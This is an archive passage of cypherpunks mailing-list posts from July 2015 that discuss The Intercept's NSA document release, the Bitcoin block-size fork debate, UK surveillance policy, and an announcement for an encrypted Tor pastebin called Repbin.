From Rayzer at riseup.net Wed Jul 1 15:06:13 2015 From: Rayzer at riseup.net (Razer) Date: Wed, 01 Jul 2015 15:06:13 -0700 Subject: The Intercept Releases ~1,264 pages of NSA Docs In-Reply-To: References: Message-ID: <55946455.8070004@riseup.net> On 07/01/2015 02:47 PM, John Young wrote: > Mostly Xkeyscore and more. > > http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB) > > List of files: > > https://pbs.twimg.com/media/CI3AatNUsAExiNV.jpg:large The//Intercept also published a detailed description and infographic of the NSA's own Foreign/Domestic Surveillance "Google" today. https://firstlook.org/theintercept/2015/07/01/nsas-google-worlds-private-communications/ -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From grarpamp at gmail.com Wed Jul 1 13:05:27 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 1 Jul 2015 16:05:27 -0400 Subject: Amazon TLS implementation Message-ID: https://github.com/awslabs/s2n s2n is a C99 implementation of the TLS/SSL protocols that is designed to be simple, small, fast, and with security as a priority. It is released and licensed under the Apache Software License 2.0. From jya at pipeline.com Wed Jul 1 14:47:53 2015 From: jya at pipeline.com (John Young) Date: Wed, 01 Jul 2015 17:47:53 -0400 Subject: The Intercept Releases ~1,264 pages of NSA Docs Message-ID: Mostly Xkeyscore and more. http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB) List of files: https://pbs.twimg.com/media/CI3AatNUsAExiNV.jpg:large From jya at pipeline.com Wed Jul 1 17:00:41 2015 From: jya at pipeline.com (John Young) Date: Wed, 01 Jul 2015 20:00:41 -0400 Subject: The Intercept Releases ~1,264 pages of NSA Docs In-Reply-To: <20150701230531.GH7143@ctrlc.hu> References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> <20150701230531.GH7143@ctrlc.hu> Message-ID: The Intercept doesn't sign Snowden files, just posts them on DocumentCloud. Best would be for Snowden to sign them if to be signed, journalists do not have capability to do it, and most could care less except to blow smoke about certification. Their lawyers advise to not certify anything leaked to them, too risky. Same procedure by all the journalist-publisher users of DocumentCloud; it is restricted to journalists-publishers, whom it is well known are quite slack about comsec, infosec and their customers's privacy in order maximize profitability of user data for advertizers. DocumentCloud, now hosting over 700,000 documents of millilons of pages, is rather easily penetrated and tampered with, but that's to be expected of anything hosted on the cloud which has the world's worst security. Worser: logs of accesses are kept and shared to authorities. Cloud may be the most grievously harmer of privacy today, soon to be surpassed by the IoT to exploit user's gullibility with promises of oh so popular faulty security measures and irresponsibly shady privacy policies. At 07:05 PM 7/1/2015, stef wrote: >On Thu, Jul 02, 2015 at 08:51:39AM +1000, Alfie John wrote: > > On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote: > > > Mostly Xkeyscore and more. > > > > > > http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB) > > > > Is there an md5sum of that link served via HTTPS? > >i'd rather prefer the intercept itself actually releasing this as a signed >archive. > >-- >otr fp: https://www.ctrlc.hu/~stef/otr.txt From jya at pipeline.com Wed Jul 1 17:26:02 2015 From: jya at pipeline.com (John Young) Date: Wed, 01 Jul 2015 20:26:02 -0400 Subject: The Intercept Releases ~1,264 pages of NSA Docs In-Reply-To: References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> <20150701230531.GH7143@ctrlc.hu> Message-ID: BTW, The Intercept documents can be downloaded from DocumentCloud: http://www.documentcloud.org/public/search/group:%20the-intercept The recent large batch is listed from June 29 to July 1, 2015. Click on number of pages which brings up thumbnails, then click the first page thumbnail to bring up viewing pages, then on the right column right click to download the original document. Documents of any other journalist outlet can be found "Group." From z9wahqvh at gmail.com Wed Jul 1 18:41:53 2015 From: z9wahqvh at gmail.com (z9wahqvh) Date: Wed, 1 Jul 2015 21:41:53 -0400 Subject: The Intercept Releases ~1,264 pages of NSA Docs In-Reply-To: References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> <20150701230531.GH7143@ctrlc.hu> Message-ID: Snowden can't really sign the files if he has absolutely no access to them, which is a critical part of the current story, otherwise we'd be right to worry about his proximity to the FSB. On Wed, Jul 1, 2015 at 8:00 PM, John Young wrote: > The Intercept doesn't sign Snowden files, just posts them on DocumentCloud. > Best would be for Snowden to sign them if to be signed, journalists do not > have capability to do it, and most could care less except to blow smoke > about certification. Their lawyers advise to not certify anything leaked to > them, too risky. > > Same procedure by all the journalist-publisher users of DocumentCloud; it > is restricted to journalists-publishers, whom it is well known are quite > slack > about comsec, infosec and their customers's privacy in order maximize > profitability of user data for advertizers. > > DocumentCloud, now hosting over 700,000 documents of millilons of > pages, is rather easily penetrated and tampered with, but that's to be > expected of anything hosted on the cloud which has the world's worst > security. Worser: logs of accesses are kept and shared to authorities. > > Cloud may be the most grievously harmer of privacy today, soon to be > surpassed by the IoT to exploit user's gullibility with promises of oh so > popular faulty security measures and irresponsibly shady privacy policies. > > > > > > > At 07:05 PM 7/1/2015, stef wrote: > >> On Thu, Jul 02, 2015 at 08:51:39AM +1000, Alfie John wrote: >> > On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote: >> > > Mostly Xkeyscore and more. >> > > >> > > http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB) >> > >> > Is there an md5sum of that link served via HTTPS? >> >> i'd rather prefer the intercept itself actually releasing this as a signed >> archive. >> >> -- >> otr fp: https://www.ctrlc.hu/~stef/otr.txt >> > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2660 bytes Desc: not available URL: From s at ctrlc.hu Wed Jul 1 16:05:31 2015 From: s at ctrlc.hu (stef) Date: Thu, 2 Jul 2015 01:05:31 +0200 Subject: The Intercept Releases ~1,264 pages of NSA Docs In-Reply-To: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> Message-ID: <20150701230531.GH7143@ctrlc.hu> On Thu, Jul 02, 2015 at 08:51:39AM +1000, Alfie John wrote: > On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote: > > Mostly Xkeyscore and more. > > > > http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB) > > Is there an md5sum of that link served via HTTPS? i'd rather prefer the intercept itself actually releasing this as a signed archive. -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From alfiej at fastmail.fm Wed Jul 1 15:51:39 2015 From: alfiej at fastmail.fm (Alfie John) Date: Thu, 02 Jul 2015 08:51:39 +1000 Subject: The Intercept Releases ~1,264 pages of NSA Docs In-Reply-To: References: Message-ID: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> Hey John, On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote: > Mostly Xkeyscore and more. > > http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB) Is there an md5sum of that link served via HTTPS? Alfie -- Alfie John alfiej at fastmail.fm From cathalgarvey at cathalgarvey.me Thu Jul 2 01:08:41 2015 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Thu, 2 Jul 2015 09:08:41 +0100 Subject: The Intercept Releases ~1,264 pages of NSA Docs In-Reply-To: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> Message-ID: <5594F189.6030807@cathalgarvey.me> ..which would provide what, exactly? :) Surely sir you mean sha512sum? On 01/07/15 23:51, Alfie John wrote: > Hey John, > > On Thu, Jul 2, 2015, at 07:47 AM, John Young wrote: >> Mostly Xkeyscore and more. >> >> http://cryptome.org/2015/07/nsa-xks-more-intercept-15-0701.7z (643MB) > > Is there an md5sum of that link served via HTTPS? > > Alfie > -- Scientific Director, IndieBio Irish Programme Now running in Cork, Ireland May->July Learn more at indieb.io and follow along! Twitter: @onetruecathal Phone: +353876363185 miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM peerio.com: cathalgarvey From rysiek at hackerspace.pl Thu Jul 2 02:28:47 2015 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 02 Jul 2015 11:28:47 +0200 Subject: progression of technologies In-Reply-To: <55906E0F.5020702@pilobilus.net> References: <20150625032613.48665228148@palinka.tinho.net> <2117510.FiH18N24he@lapuntu> <55906E0F.5020702@pilobilus.net> Message-ID: <1842658.zh3VyRJx1L@lapuntu> Dnia niedziela, 28 czerwca 2015 17:58:39 Steve Kinney pisze: > >> The age of privacy, and everything with it, including the > >> freedom of association and separation of public and private > >> life, is ending. The public is smiling merrily along the > >> road. 1984 is coming, but the public is not scared or > >> suppressed. They are smiling happy people, obedient and > >> cheerful, and they take the best of care of their keepers. > > The end of "privacy as we know it" is only a dystopian scenario if > the institutions of authoritarian governance survive in the > post-privacy world. I don't believe they can survive, because the > same network infrastructure that has already made so much formerly > "private" information public also shifts the balance of power away > from established institutions in fundamental ways. I'm afraid, unfortunately, that the head start we got by jumping on this Internet thingy early on and figuring shit out is slowly running out. The NSA and the rest of Five Eyes figured this shit out now, too -- along with "oh wait, there was no privacy-by-design anywhere? that's cute". And they have a much, much bigger budget. Between that, and the populace being herded by "EHRMAHGEHRD TEHRRISTS!" on one hand and "privacy is gone, baby" on the other, we are not winning this one right now. > Keeping State and Corporate secrets out of public view is becoming > progressively more difficult, while the mechanism of ad-hoc self > organizing "smart mob" actions arising from the public at large is > an emergent challenge to established power centers. If and as > these trends continue to accelerate, the nature of political power > will eventually be transformed. That's why "hackers", "hacktivists" and "Anonymous" are used as synonyms of "terrorists" by the powers that are. And the media. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Thu Jul 2 02:38:54 2015 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 02 Jul 2015 11:38:54 +0200 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> Message-ID: <1723765.Bfy9H6RHV9@lapuntu> Dnia niedziela, 28 czerwca 2015 20:52:43 Sean Lynch pisze: > Wow, that's a low blow. Arguing by authority, and then a false dichotomy: > "either you know more about Bitcoin than X, or you should not have a voice > at > all on this" > > Might I suggest considering arguing on the merits instead, next time? :) > > > > Perhaps if you bothered to read more than the last message in the thread > you would realize that I already attempted that. I think your expectations > are a bit high when there are people on the thread arguing that we should > really consider the opinions of those making death threats. IOW listen to > the terrorists. But that's exactly why I was so surprised. I filter out the people that make no sense or deat5h threats, but when I see a person that usually seems to make sense, and yet lands a straw man, I'm taken aback. :) > It seems to me that people are terrified by a hard fork because they have a > huge stake in Bitcoin. To me that's the best argument there could possibly > be to fork now and get it out of the way. Bitcoin can't survive if it > ossifies due to the fears of morons who can't be bothered to diversify > their investment, and who have such low morals that they'd stoop to making > death threats. Fair point. > If we're going to argue based on the merits then let's do that, and leave > the death threats and doom and gloom out of it. We need to be thinking > beyond Bitcoin to the future of cryptocurrencies on general, and a healthy > cryptocurrencies ecosystem cannot survive as an ossified monoculture. The question is: can the *cryptocurrency* ecosystem survive if BitCoin hard- forks. Some say "no, because loss of trust"; some say "yeah, it will actually grow strong". I'm not convinced either way. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Thu Jul 2 02:46:19 2015 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 02 Jul 2015 11:46:19 +0200 Subject: Privacy advocates resign over facial recognition plans In-Reply-To: <5591A49E.4040204@riseup.net> References: <2307550.aktsLoVmFc@lapuntu> <5591A49E.4040204@riseup.net> Message-ID: <19407322.87nTAoSQ5D@lapuntu> Dnia poniedziałek, 29 czerwca 2015 13:03:42 Razer pisze: > On 06/28/2015 10:57 AM, rysiek wrote: > > But maybe we can find ways to raise the cost of surveillance? > > I'm still considering sending encrypted pics of lulzcats with every > mundane email I send to force the NSA to store it for 'perpetuity'. Hah, good call. > "and if 50 people a day walked in, sang a bar of Alice's Restaurant, and > walked out, they MIGHT think it was a movement" ~Arlo Guthrie +1 :) -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From coderman at gmail.com Thu Jul 2 17:43:02 2015 From: coderman at gmail.com (coderman) Date: Thu, 2 Jul 2015 17:43:02 -0700 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> Message-ID: On 7/2/15, Lodewijk andré de la porte wrote: > ... > So.. these points were already hard to argue against clearly. Then there's > "we can scale externally".... The trouble is that there's so many ways, > like pinning (sidechains/mastercoin), exclusively inter-institutional > settlement, debt based moneys ("the bearer of this token is entitled > to..."), and all of them could work! In fact, we could just abandon Bitcoin > alltogether! > ... > And that's the core of my counterargument: we don't have to > cripple Bitcoin, so let's not. thank you for the patient summarization of many complex points of contention around this subject, including the social(market) aspects which may not come easy to a technical mind. > The Chinese mining pools stamping their document regarding increasing the > blocksize to 8mb was extraordinary. They ignored Gavin's 20mb or anything > proposal ("or anything" probably mostly to make 20mb seem reasonable). They > stamped - a thing completely outdated in the West, yet common in Asia (and > pretty badass). They are a group of Chinese making law for everyone. speaking of "not much to do about it now..." :) > So - conclusively - Gavin is a hero, the Internet's retarded, Bitcoin is in > policy jail but it likes it there. Oh, and the free-est market of the world > is already significantly run by Chinese. If you read this far, thanks. agreed. onward to proof of useful work! [sounds trivial, let's r/AskReddit! ...] best regards, From alfiej at fastmail.fm Thu Jul 2 01:23:23 2015 From: alfiej at fastmail.fm (Alfie John) Date: Thu, 02 Jul 2015 18:23:23 +1000 Subject: The Intercept Releases ~1,264 pages of NSA Docs In-Reply-To: <5594F189.6030807@cathalgarvey.me> References: <1435791099.1299973.313067361.06F57DFB@webmail.messagingengine.com> <5594F189.6030807@cathalgarvey.me> Message-ID: <1435825403.2763717.313350353.3F42FCF7@webmail.messagingengine.com> On Thu, Jul 2, 2015, at 06:08 PM, Cathal Garvey wrote: > ..which would provide what, exactly? :) > > Surely sir you mean sha512sum? > > > Is there an md5sum of that link served via HTTPS? Sorry, muscle memory kicked in. Good pickup! Alfie -- Alfie John alfiej at fastmail.fm From coderman at gmail.com Thu Jul 2 19:34:09 2015 From: coderman at gmail.com (coderman) Date: Thu, 2 Jul 2015 19:34:09 -0700 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> Message-ID: On 7/2/15, coderman more bullshit...: > ... btw, actual consensus hard fork - early days of bitcoin you get a badtx/freminehack it was possible and tractable to manage a coordinated, voluntary consensus move to specific re-wind, specific revision, and resume. it took exceptional circumstances - and as per thread above and long discussions else where, there is nothing nearly so dire facing BTC's present or near future. beyond that, who can say with confidence? including those proposing unprecedented actions against consensus? if i was back in FR for the fourth, i'd have some of this tenderized horse corpse for meal. instead, end of my opinion here. best regards, From grarpamp at gmail.com Thu Jul 2 23:35:37 2015 From: grarpamp at gmail.com (grarpamp) Date: Fri, 3 Jul 2015 02:35:37 -0400 Subject: Brits: Cameron swats at crypto again, GCHQ spies Amnesty Message-ID: http://arstechnica.co.uk/tech-policy/2015/07/cameron-reaffirms-there-will-be-no-safe-spaces-from-uk-government-snooping/ http://betanews.com/2015/07/02/uk-government-illegally-spied-on-amnesty-international/ From l at odewijk.nl Thu Jul 2 16:24:20 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Fri, 3 Jul 2015 08:24:20 +0900 Subject: [Bitcoin-development] questions about bitcoin-XT code fork & non-consensus hard-fork In-Reply-To: <1723765.Bfy9H6RHV9@lapuntu> References: <20150616081131.GL10743@leitl.org> <1741267.YsnpBZuTEf@lapuntu> <1723765.Bfy9H6RHV9@lapuntu> Message-ID: 2015-07-02 18:38 GMT+09:00 rysiek : > Dnia niedziela, 28 czerwca 2015 20:52:43 Sean Lynch pisze: > > Wow, that's a low blow. Arguing by authority, and then a false dichotomy: > > "either you know more about Bitcoin than X, or you should not have a > voice > > at > > all on this" > > > > Might I suggest considering arguing on the merits instead, next time? :) > > > > > > > > Perhaps if you bothered to read more than the last message in the thread > > you would realize that I already attempted that. I think your > expectations > > are a bit high when there are people on the thread arguing that we should > > really consider the opinions of those making death threats. IOW listen to > > the terrorists. > > But that's exactly why I was so surprised. I filter out the people that > make > no sense or deat5h threats, but when I see a person that usually seems to > make > sense, and yet lands a straw man, I'm taken aback. :) > Saying Gavin knows quite a lot about Bitcoin is not an argument of authority. It doesn't make him right, but it does make him very likely to be right. Certainly more likely than the heapings of shitty arguments, especially those that are technically disconnected from what bitcoin is. When you listen to the arguments about blocksize it usually goes something like: Pro: * Cheaper transactions * More truly Bitcoin transactions * Simplest way to scale There's some derivative arguments regarding poor people's access to Bitcoin and a herd of applications that just require cheap access to the blockchain. I think the most noteworthy argument is: * Bitcoin becomes more competitive/attractive as a result of cheaper transactions Con: * We can already fit quite some txs * the blockchain will be less wieldable * the bandwidth required to keep up with the blockchain (regardless of storage) will increase * we can scale externally The derivative arguments here are also poor people's access to Bitcoin, wrt bandwidth, but the argument holds up much worse as SPV would work just fine over those rare very slow connections. Then there's a lot of downright fearmongering like "only institutions will run full nodes". Economically that's just not true, and technologically it's not important - crypto features allow usability immediately (simplefied (commercial) APIs, "blind" tx broadcasting), strong guarantees *very *quickly (SPV), and certainty and independence if you'd like it (a pruning full node), and history novelty at only minor hassle (less than a day's work). Even a 100 fold increase in blocksize would not radically change this. It's pretty annoying to have an even bigger blockchain, don't get me wrong on that, but that's just the way Bitcoin works: a blockchain that grows with use. There's no reason for it to truly upset you, either. Running a full node is already something you don't do for no reason at all. I can't really make this argument as well as I like. The point is that if you have a reason you would still do it later, and if you don't you don't already. Some people noted that the pruning makes it possible to run a full node on their phones. Cool! But there's no reason to. In fact, you won't because it'd drain your battery. We'll be okay without the one silly geek that does it anyway. So.. these points were already hard to argue against clearly. Then there's "we can scale externally".... The trouble is that there's so many ways, like pinning (sidechains/mastercoin), exclusively inter-institutional settlement, debt based moneys ("the bearer of this token is entitled to..."), and all of them could work! In fact, we could just abandon Bitcoin alltogether! And that's the core of my counterargument: we don't have to cripple Bitcoin, so let's not. Let's not make it more complicated than it has to be. If we do scale externally, let it be for exceedingly good reasons and at exceedingly competitive prices. Mostly I see people haggling over nothing on Reddit, and even here. There's also confusion about roles in the Bitcoin ecosystem, and about ideals. Then there's confusion about consent, and how to manage it. It's probably because all those things are badly fleshed out. Hard-to-achieve consensus has advantages; Bitcoin will be technologically stable. The roles will shift anyway. Ideals are not inherent, only cold hard currency is. It's implications depend on culture and math, both generally not very well understood. Reddit has never been conducive to quality argument - at fantastic loss to everyone but the populists. I think, ultimately, that giving Gavin ultimate authority for 10 years then freezing the whole ordeal would probably work out rather well. I think it's ran afoul of his control too soon. We already have some weird bugs in Bitcoin. Then there's some strange (unstudied) economical effects like the halving (and why not gradual decrease?). I'm sure lots of people found similar oddities from their perspectives. There's just not much to do about it anymore now. The Chinese mining pools stamping their document regarding increasing the blocksize to 8mb was extraordinary. They ignored Gavin's 20mb or anything proposal ("or anything" probably mostly to make 20mb seem reasonable). They stamped - a thing completely outdated in the West, yet common in Asia (and pretty badass). They are a group of Chinese making law for everyone. (not-a-magnet-or-similar-document-oriented-link: http://i.imgur.com/JUnQcue.jpg) Gavin appeased them and provided for unattended growth with a period 8mb increase. Smart move. So - conclusively - Gavin is a hero, the Internet's retarded, Bitcoin is in policy jail but it likes it there. Oh, and the free-est market of the world is already significantly run by Chinese. If you read this far, thanks. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7476 bytes Desc: not available URL: From andreas at junius.info Fri Jul 3 00:04:06 2015 From: andreas at junius.info (Andreas Junius) Date: Fri, 03 Jul 2015 16:34:06 +0930 Subject: Brits: Cameron swats at crypto again, GCHQ spies Amnesty In-Reply-To: References: Message-ID: <559633E6.3070601@junius.info> Funnily enough, terrorists aren't using e-mail anyway. They announce their attacks and the results on facebook and twitter for everyone to read. http://www.peemail.org/ On 03/07/15 16:05, grarpamp wrote: > http://arstechnica.co.uk/tech-policy/2015/07/cameron-reaffirms-there-will-be-no-safe-spaces-from-uk-government-snooping/ > > http://betanews.com/2015/07/02/uk-government-illegally-spied-on-amnesty-international/ From odinn.cyberguerrilla at riseup.net Fri Jul 3 16:55:24 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Fri, 03 Jul 2015 16:55:24 -0700 Subject: [cryptome] NYT on Nick Szabo and Bitcoin In-Reply-To: References: Message-ID: <559720EC.4050708@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Are they still at it? 退屈な On 05/18/2015 09:51 AM, JS733NknRj6J wrote: > I seem to vaguely remember this profile (or one like it) but can't > turn it up myself. Would be very grateful for the link if you do > repost it. > > - JS7 > > Sent from ProtonMail , encrypted email based > in Switzerland. > > -------- Original Message -------- Subject: Re: [cryptome] NYT on > Nick Szabo and Bitcoin Time (GMT): May 18 2015 13:13:12 From: > wilfred at vt.edu To: cryptome at freelists.org CC: > cypherpunks at cpunks.org, cryptography at metzdowd.com, > cryptography at randombit.net > > We did a context profile on Satoshi with analysis of intel-based > datacenter profiles and certain known paterns from the USSS > (Treasury Fincen) crew you like so much at Yale and another > specific MI5 ish unit whome you remember from Anguilla. The > analysis clustered age and language patterns and identified a very > tight range of character and background with institutional intent, > then modeled the propaganda influence that gave rise to the BTC > trend. The analysis was posted on the forums and pdf, but are > missing from search. We will repost the original and add some > current profile analysis. In short, the character is a 20s 2-year > AS pre-law 1811 (police) with distinct interest in using US/UK and > new international law *pyramid scheme policies to take over global > legacy datacenters* in criminal forfeiture cases. Another party did > a review of law&policy influencers of the same market and > similarily isolated the core group. (no need to mention > DEA+FINCEN.) > > On Sunday, May 17, 2015, John Young > wrote: > > nytimes.com/2015/05/17/business/decoding-the-enigma-of-satoshi-nakamot o-and-the-birth-of-bitcoin.html > > > > Those around cypherpunks 1993-1998 will recall Szabo's emails on > bitcoin early precursors along with Adam Back, Hal Finney, Tim > May, Wei Dai, Lucky Green, Hettinga, many more burgeoning F-Cs. > NYT piece credits cpunks as subversive birther, now being > hyper-monetized by arch-cryptoanarchist Goldman Sachs and many more > centralists. > > Szabo denies being Satoshi, but ... others rush to fill the gap > > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVlyDsAAoJEGxwq/inSG8ClPYIAMQ4hiz0Yrs/JaMzgchV+Xyb IaVBEfvoqGXNxd4n5kIfdlccFKekZ1VTuvDkAesjVcEN0OGJ2Ug30hAMNKPItKDP GFV9j+q2OcA3BOfgxmiMfUp0aCTA0WKOYgfcGO5RO8w0lf6KxlUCW5lYpQnQg5BH m6bKtYcJH31BJSBvCCNHvqlLUzYw6ftu5jF5iq+HjPV+2F+tQErTCSPLg7tdqPpd X5Rjby+N1MOIKt7WZEgtRO1nrE5SD4PpBXfTuO91DaNXxFbOQNaEMCjMiOkFotkX 2EWmDy5BdUxmNWYmA0JwDmiiKBa9FRFEW1YjxVWPoxHS+sZ0VRs6XgegvYdn3qc= =X6HJ -----END PGP SIGNATURE----- From list at sysfu.com Sat Jul 4 08:08:00 2015 From: list at sysfu.com (Seth) Date: Sat, 04 Jul 2015 08:08:00 -0700 Subject: There's this really kewl mesh network that's being deployed world-wide... Message-ID: ...have you heard about it? No? Well...odds are you've already given implied consent for the IoT. https://www.youtube.com/watch?v=0hJqs1jwAPc From jya at pipeline.com Sat Jul 4 07:44:44 2015 From: jya at pipeline.com (John Young) Date: Sat, 04 Jul 2015 10:44:44 -0400 Subject: Bitcoin Book Review Message-ID: http://www.nytimes.com/2015/07/05/books/review/nathaniel-poppers-digital-gold-looks-at-bitcoin.html?ref=books&_r=0 Quote: The most poignant moment in the book comes when Popper contrasts a conference for the more ideologically minded Bitcoiners at a racetrack on the outskirts of Austin, where Ulbricht grew up, with the gathering of the rich and powerful at the South by Southwest festival, where Ulbricht’s mother is politely dismissed as she pleads for funds to help defray her son’s legal costs. It was an “unhappy reminder of a side of Bitcoin” that its new adherents “wanted to put behind them,” Popper writes. And as he notes, “If this was the new world, it didn’t seem all that different from the old one ­ at least not yet.” Nor can “Digital Gold” be a tale with a satisfying ending, because the future of Bitcoin is unknowable right now. As the venture capitalist Barry Silbert says at a Goldman Sachs conference, Bitcoin “is either going to change everything, or nothing.” But if Bitcoin doesn’t change every­thing, people will keep trying to find something that will, and so Popper’s book stands as necessary reading, and very intriguing at that, regardless of the eventual fate of his subject. Unquote. From ryan.pear at ownbay.net Sat Jul 4 09:14:20 2015 From: ryan.pear at ownbay.net (ryan.pear at ownbay.net) Date: Sat, 04 Jul 2015 16:14:20 +0000 Subject: Announcement: Replicated Encrypted PasteBin Message-ID: It's been a while since code was announced on cypherpunks... RepBin: https://github.com/repbin/repbin/tree/v0.0.1 Repbin is an encrypted pastebin for the command line that runs over Tor! Repbin servers form a distributed network where nodes sync posts with each other (like in Usenet or BBS/Fido systems). This makes Repbin resilient and scalable. Repbin focuses on privacy (encrypted messages) and anonymity (padding and repost chains). Features -------- - Forward secure encryption of posts using DHE-curve25519. Even a compromised long-term key does not allow to decrypt old posts. - Integrity protection of posts using HMAC-SHA256. You can be sure that posts have not been tampered with. - Confidentiality of posts using AES256-CTR. Without the recipient key, nobody can read the post. - All posts are padded to a common size. That means that posts are not distinguishable by their size when looking ``on the wire''. - Post are replicated between all servers in the Repbin network. - Optional constant receiver keys for post-box functionality. - Receiver key attributes for synchronization and post-box authentication. - Resource control via hashcash (sha256) and ed25519. - Some privacy protection by using Tor for all communication and ephemeral keys. - undocumented goodies. Post a file ----------- $ cat FILE | repclient As a response you will receive output like this: Pastebin Address: http://bvuk3xmvslx3idcj.onion/3x77hJtt42MkGbs18e1ZvBw9oAftAUrr9K9x4E8rQzed_2PGBikD5hEcXh7kT4vtKPsZuwymWMeBNeGiRpQ24upB3 Simply give the Pastebin Address to whoever should gain access to the file. Fetch: $ repclient http://bvuk3xmvslx3idcj.onion/3x77hJtt42MkGbs18e1ZvBw9oAftAUrr9K9x4E8rQzed_2PGBikD5hEcXh7kT4vtKPsZuwymWMeBNeGiRpQ24upB3 Installation ------------ Client software to send and receive file: $ go get -u github.com/repbin/repbin/cmd/repclient Peering ------- If you are an experienced UNIX sysadmin, please consider running your own Repbin server to help the Repbin network. While running a server requires hardly any interaction, setting up a server in the Repbin network requires at least one manual peering agreement with another server in the network. This is a time-tested architecture which is used successfully to run the Internet, the Usenet, and BBS networks like FidoNet. To set up a peering you have to exchange public peering keys with another server and configure your server accordingly. To get in touch with us for peering send a message to 7VW3oPLzQc7VS2anLyDtrdARDdSwa7QTF7h3N2t6J2VN_AjWZQfHoqK3yNqvXPkcswLNXSzFrCzJuRRKZKvY71UWT and don't forget to put your own key into the message. The server installation and the peering process is described in detail in the documentation. Here be dragons... ------------------ Dive deeper into the documentation and the code, if you want to figure out how to send repost messages (remailer style) and how to run your own reposter service! WARNING ------- THIS SOFTWARE HAS NEVER BEEN AUDITED OR REVIEWED. IT HAS NOT BEEN TESTED. THE AUTHORS ARE AMATEURS AND YOU SHOULD NOT USE THIS SOFTWARE FOR ANYTHING IMPORTANT. YOU SHOULD NOT RELY ON THE SOFTWARE TO WORK AT ALL, OR IN ANY PREDICTABLE WAY, NOR SHOULD YOU ASSUME THAT THE FEATURES CLAIMED ARE THE FEATURES IMPLEMENTED. THIS SOFTWARE IS FULL OF ERRORS, THE ARCHITECTURE AND DESIGN ARE BROKEN. UNLESS SOME EXPERT CLAIMS OTHERWISE. From juan.g71 at gmail.com Sat Jul 4 12:39:55 2015 From: juan.g71 at gmail.com (Juan) Date: Sat, 4 Jul 2015 16:39:55 -0300 Subject: SR - was Bitcoin Book Review In-Reply-To: References: Message-ID: <5598367f.8612370a.5415.4479@mx.google.com> On Sun, 5 Jul 2015 00:09:45 +0900 Lodewijk andré de la porte wrote: > It's his own bloody fault for staying in the US, too! Go > teach English in China for a while or something. Give'm a challenge! Perhaps, when he realized that he shouldn't be running a black market while living in the US, it was too late. The person who wrote under the DPR nickname in the silk road forum seemed to believe that he was protecteed by the pentagon's fake anonimity network (aka tor) and that the government was too stupid to get him... From coderman at gmail.com Sat Jul 4 22:25:14 2015 From: coderman at gmail.com (coderman) Date: Sat, 4 Jul 2015 22:25:14 -0700 Subject: speaking of Bitcoin ... the july4th split Message-ID: sometimes even consensus not enough, [ failure at 95% agreement! ] SPV is a compensating measure that addresses block size without reifying incompatibilities. however, with drawbacks and risk, as taken on chin in this one: https://bitcoin.org/en/alert/2015-07-04-spv-mining """ Summary: Some miners are currently generating invalid blocks. Almost all software (besides Bitcoin Core 0.9.5 and later) will accept these invalid blocks under certain conditions. The paragraphs that follow explain the cause more throughly. For several months, an increasing amount of 